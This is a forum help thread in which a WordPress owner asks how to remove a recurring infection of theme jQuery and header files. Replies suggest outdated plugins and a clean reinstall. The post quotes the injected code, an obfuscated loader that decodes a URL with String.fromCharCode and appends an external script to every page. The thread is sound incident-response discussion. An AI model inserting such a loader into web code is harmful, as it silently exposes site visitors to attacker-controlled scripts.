T
T
tomtaker2018-08-23 18:49:39
Burglary protection
tomtaker, 2018-08-23 18:49:39

How to clean the site from the "virus"?

Good afternoon, I encountered an extremely unpleasant phenomenon, namely:
Something regularly modifies the jqyery and header files of all the themes of the site
Accordingly, I clean the files and after a while it happens again
According to the tags, it’s clear, but still I’ll clarify that this is WordPress
Please tell me where to look this infection
Here is the actual modification code

var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 110, 112, 106, 108, 99); var scripts = document.getElementsByTagName('script');
  var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);}/*! jQuery Validation Plugin - v1.15.1 - 7/22/2016

Answer the question

In order to leave comments, you need to log in

3 answer(s)
T
tomtaker, 2018-08-25
@tomtaker

found the answer - https://blog.sucuri.net/2017/09/old-themes-abandon...

D
Dimonchik, 2018-08-23
@dimonchik2013

in WP it usually crawls through modules, especially those that have not been updated for a long time,
inda is treated by rolling everything new onto the same base (copy)

S
Stanislav Bodrov, 2018-08-25
@jenki

Demolish everything. That's all. And the OS too. Re-roll everything wisely.

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question